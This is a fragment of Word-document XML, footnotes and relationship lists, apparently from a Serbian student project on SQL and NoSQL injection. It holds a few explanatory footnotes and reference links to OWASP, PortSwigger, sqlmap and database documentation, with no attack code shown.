          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="2">
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">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Podaci koje vraća konačan upit u primeru su predstavljeni u formi rečnika (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dictionary</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), te su vrednosti prezentovane kao </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">None</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> umesto </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="3">
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B1">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Generisano pomoću Claude.ai: </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/teo-kal/DBMS-2-database-attacks/blob/main/project/2-nosqli/server.js</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b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png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.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9.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><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8.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/nosql-injection" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dbvis.com/thetable/parameterized-queries-in-sql-a-guide/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.datacamp.com/tutorial/preventing-sql-no-sql-injection-attacks-in-mongo-db" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/fundamentals/what-is-remote-code-execution-rce/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A03_2021-Injection" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.postgresql.org/docs/current/infoschema-columns.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_union.asp" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/en/database/oracle/oracle-database/23/sqlrf/Scalar-Subquery-Expressions.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.postgresql.org/docs/current/view-pg-roles.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/application-security-testing/oast" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.datacamp.com/tutorial/sql-subquery" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/></Relationships>
</file>

<file path=word/_rels/footnotes.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sqlmap.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/teo-kal/DBMS-2-database-attacks/blob/main/project/2-nosqli/server.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